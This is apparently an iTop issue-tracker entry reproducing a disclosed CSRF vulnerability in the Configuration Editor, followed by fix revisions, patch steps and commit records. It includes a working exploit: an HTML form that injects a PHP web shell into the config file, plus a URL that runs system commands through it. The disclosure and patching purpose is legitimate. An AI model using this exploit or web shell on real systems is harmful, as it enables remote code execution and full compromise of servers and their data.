Security Vulnerability reported by High-Tech Bridge Security Research Lab (https://www.htbridge.com/advisory/HTB23293)
A remote unauthenticated attacker can perform CSRF attack and execute arbitrary PHP code on the vulnerable system with privileges of the web server. Successful exploitation of the vulnerability may allow an attacker to execute arbitrary system commands on the web server, gain complete access to vulnerable web application and its databases that may contain very sensitive information.
The attacker shall create a malicious web page with CSRF exploit code, trick a logged-in administrator to visit the page, spoof the HTTP request, as if it was coming from the legitimate user, and permanently inject malicious PHP code into iTop configuration file.
CSRF exploit will inject the following PHP code into iTop configuration file:
<? if(isset($_GET['cmd'])) die(passthru($_GET['cmd'])); ?>
To reproduce the vulnerability, just create an empty HTML file, paste the following exploit code into it:
<form action="http://[host]/env-production/itop-config/config.php?c%5Bmenu%5D=ConfigEditor" method="post" name="main"> <input type="hidden" name="operation" value="save"> <input type="hidden" name="prev_config" value="1"> <input type="hidden" name="new_config" value="<? if(isset($_GET['cmd'])) die(passthru($_GET['cmd'])); ?>"> <input value="submit" id="btn" type="submit" /> </form>
And then login to iTop website and open the file in your browser. After successful injection the attacker can run arbitrary system commands using "/pages/UI.php" script. A link below will display output of "/bin/ls" command for current application's directory:
http://[host]/pages/UI.php?cmd=ls[/cmd]
Fix committed as:
revision [r3902] in /trunk
revision [r3904] in /branches/2.2.0
revision [r3905] in /branches/2.1.1
revision [r3906] in /branches/2.1.0
To patch your iTop, simply replace the file datamodels/2.x/itop-config/config.php by the version from the appropriate revision above, then run the setup again.
Related
Commit: <Commit _id='5358055aa02bb175d1406271:3902' tree_id='5ca984adcc8e5030fe5290f70f21d03f05836c01' committed=I{'date': datetime.datetime(2016, 2, 11, 10, 22, 53, 778000), 'email': '', 'name': 'dflaven'} authored=I{'date': datetime.datetime(2016, 2, 11, 10, 22, 53, 778000), 'email': '', 'name': 'dflaven'} message='#1202: Fix for a security vulnerability in the Configuration Editor.' parent_ids=I['5358055aa02bb175d1406271:3901'] child_ids=I['5358055aa02bb175d1406271:3903'] repo_ids=I[ObjectId('5358055aa02bb175d1406271')]>
Commit: <Commit _id='5358055aa02bb175d1406271:3904' tree_id='b885be8d4da6573728958d1b66795644e4a9b2d7' committed=I{'date': datetime.datetime(2016, 2, 11, 10, 27, 52, 119000), 'email': '', 'name': 'dflaven'} authored=I{'date': datetime.datetime(2016, 2, 11, 10, 27, 52, 119000), 'email': '', 'name': 'dflaven'} message='(retrofit from trunk) #1202: Fix for a security vulnerability in the Configuration Editor.' parent_ids=I['5358055aa02bb175d1406271:3903'] child_ids=I['5358055aa02bb175d1406271:3905'] repo_ids=I[ObjectId('5358055aa02bb175d1406271')]>
Commit: <Commit _id='5358055aa02bb175d1406271:3905' tree_id='18cb79d21870a07d6a9242823ba73bc8b311405c' committed=I{'date': datetime.datetime(2016, 2, 11, 10, 30, 19, 295000), 'email': '', 'name': 'dflaven'} authored=I{'date': datetime.datetime(2016, 2, 11, 10, 30, 19, 295000), 'email': '', 'name': 'dflaven'} message='(retrofit from trunk) #1202: Fix for a security vulnerability in the Configuration Editor.' parent_ids=I['5358055aa02bb175d1406271:3904'] child_ids=I['5358055aa02bb175d1406271:3906'] repo_ids=I[ObjectId('5358055aa02bb175d1406271')]>
Commit: <Commit _id='5358055aa02bb175d1406271:3906' tree_id='04e955b7524059cc14842801466f3f2db9cd867e' committed=I{'date': datetime.datetime(2016, 2, 11, 10, 32, 53, 543000), 'email': '', 'name': 'dflaven'} authored=I{'date': datetime.datetime(2016, 2, 11, 10, 32, 53, 543000), 'email': '', 'name': 'dflaven'} message='(retrofit from trunk) #1202: Fix for a security vulnerability in the Configuration Editor.' parent_ids=I['5358055aa02bb175d1406271:3905'] child_ids=I['5358055aa02bb175d1406271:3907'] repo_ids=I[ObjectId('5358055aa02bb175d1406271')]>
Last edit: Denis 2016-02-11